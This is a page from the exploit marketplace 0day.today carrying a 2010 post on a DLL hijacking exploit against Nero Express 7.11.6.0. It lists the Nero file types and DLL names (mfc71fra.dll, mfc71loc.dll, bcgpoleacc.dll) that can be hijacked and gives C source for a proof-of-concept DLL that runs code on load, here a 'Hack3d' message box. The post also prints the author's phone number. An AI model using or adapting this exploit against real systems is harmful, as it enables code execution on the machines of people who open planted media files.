0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Nero Express 7.11.6.0 DLL Hijacking Exploit
=========================================== Nero Express 7.11.6.0 DLL Hijacking Exploit =========================================== 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 0 _ __ __ __ 1 1 /' \ __ /'__`\ /\ \__ /'__`\ 0 0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1 1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0 0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1 1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0 0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1 1 \ \____/ >> Exploit database separated by exploit 0 0 \/___/ type (local, remote, DoS, etc.) 1 1 1 0 [+] Site : Inj3ct0r.com 0 1 [+] Support e-mail : submit[at]inj3ct0r.com 1 0 0 1 ####################################### 1 0 I'm indoushka member from Inj3ct0r Team 1 1 ####################################### 0 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1 ######################################################################## # Vendor: http://www.nero.com/ # Date: 2010-07-27 # Author : indoushka # Thanks to : Dz-Ghost Team # Contact : 00213771818860 # Tested on : windows SP2 Francais V.(Pnx2 2.0) ######################################################################## # Exploit By indoushka ------------- wvs.exe ------- exploited nero.exe with exploit.cue using mfc71fra.dll exploited nero.exe with exploit.cue using mfc71loc.dll exploited nero.exe with exploit.cue using bcgpoleacc.dll exploited nero.exe with exploit.iso using mfc71fra.dll exploited nero.exe with exploit.iso using mfc71loc.dll exploited nero.exe with exploit.nhf using mfc71fra.dll exploited nero.exe with exploit.nhf using mfc71loc.dll exploited nero.exe with exploit.nhv using mfc71fra.dll exploited nero.exe with exploit.nhv using mfc71loc.dll exploited nero.exe with exploit.nmd using mfc71fra.dll exploited nero.exe with exploit.nmd using mfc71loc.dll exploited nero.exe with exploit.nmd using bcgpoleacc.dll exploited nero.exe with exploit.nr3 using mfc71fra.dll exploited nero.exe with exploit.nr3 using mfc71loc.dll exploited nero.exe with exploit.nr3 using bcgpoleacc.dll exploited nero.exe with exploit.nr4 using mfc71fra.dll exploited nero.exe with exploit.nr4 using mfc71loc.dll exploited nero.exe with exploit.nr4 using bcgpoleacc.dll exploited nero.exe with exploit.nra using mfc71fra.dll exploited nero.exe with exploit.nra using mfc71loc.dll exploited nero.exe with exploit.nra using bcgpoleacc.dll exploited nero.exe with exploit.nrb using mfc71fra.dll exploited nero.exe with exploit.nrb using mfc71loc.dll exploited nero.exe with exploit.nrb using bcgpoleacc.dll exploited nero.exe with exploit.nrc using mfc71fra.dll exploited nero.exe with exploit.nrc using mfc71loc.dll exploited nero.exe with exploit.nrc using bcgpoleacc.dll exploited nero.exe with exploit.nrd using mfc71fra.dll exploited nero.exe with exploit.nrd using mfc71loc.dll exploited nero.exe with exploit.nrd using bcgpoleacc.dll exploited nero.exe with exploit.nre using mfc71fra.dll exploited nero.exe with exploit.nre using mfc71loc.dll exploited nero.exe with exploit.nre using bcgpoleacc.dll exploited nero.exe with exploit.nrg using mfc71fra.dll exploited nero.exe with exploit.nrg using mfc71loc.dll exploited nero.exe with exploit.nrg using bcgpoleacc.dll exploited nero.exe with exploit.nrh using mfc71fra.dll exploited nero.exe with exploit.nrh using mfc71loc.dll exploited nero.exe with exploit.nrh using bcgpoleacc.dll exploited nero.exe with exploit.nri using mfc71fra.dll exploited nero.exe with exploit.nri using mfc71loc.dll exploited nero.exe with exploit.nri using bcgpoleacc.dll exploited nero.exe with exploit.nrj using mfc71fra.dll exploited nero.exe with exploit.nrj using mfc71loc.dll exploited nero.exe with exploit.nrj using bcgpoleacc.dll exploited nero.exe with exploit.nrm using mfc71fra.dll exploited nero.exe with exploit.nrm using mfc71loc.dll exploited nero.exe with exploit.nrm using bcgpoleacc.dll exploited nero.exe with exploit.nrs using mfc71fra.dll exploited nero.exe with exploit.nrs using mfc71loc.dll exploited nero.exe with exploit.nrs using bcgpoleacc.dll exploited nero.exe with exploit.nru using mfc71fra.dll exploited nero.exe with exploit.nru using mfc71loc.dll exploited nero.exe with exploit.nru using bcgpoleacc.dll exploited nero.exe with exploit.nrv using mfc71fra.dll exploited nero.exe with exploit.nrv using mfc71loc.dll exploited nero.exe with exploit.nrv using bcgpoleacc.dll exploited nero.exe with exploit.nrw using mfc71fra.dll exploited nero.exe with exploit.nrw using mfc71loc.dll exploited nero.exe with exploit.nrw using bcgpoleacc.dll exploited nero.exe with exploit.nsd using mfc71fra.dll exploited nero.exe with exploit.nsd using mfc71loc.dll exploited nero.exe with exploit.nsd using bcgpoleacc.dll ------------- #include "stdafx.h" #include "stdlib.h" void init() { MessageBox(NULL,"indoushka", "Hack3d",0x00000003); } BOOL APIENTRY DllMain( HANDLE hModule, DWORD ul_reason_for_call, LPVOID lpReserved ) { switch (ul_reason_for_call) { case DLL_PROCESS_ATTACH: init();break; case DLL_THREAD_ATTACH: case DLL_THREAD_DETACH: case DLL_PROCESS_DETACH: break; } return TRUE; } Dz-Ghost Team ===== Saoucha * Star08 * Cyber Sec * theblind74 * XproratiX * onurozkan * n2n * Meher Assel =========================== special thanks to : r0073r (inj3ct0r.com) * L0rd CruSad3r * MaYur * MA1201 * KeDar * Sonic * gunslinger_ * SeeMe * RoadKiller Sid3^effects * aKa HaRi * His0k4 * Hussin-X * Rafik * Yashar * SoldierOfAllah * RiskY.HaCK * Stake * r1z * D4NB4R * www.alkrsan.net MR.SoOoFe * ThE g0bL!N * AnGeL25dZ * ViRuS_Ra3cH * Sn!pEr.S!Te --------------------------------------------------------------------------------------------------------------------------------- # 0day.today [2024-11-16] #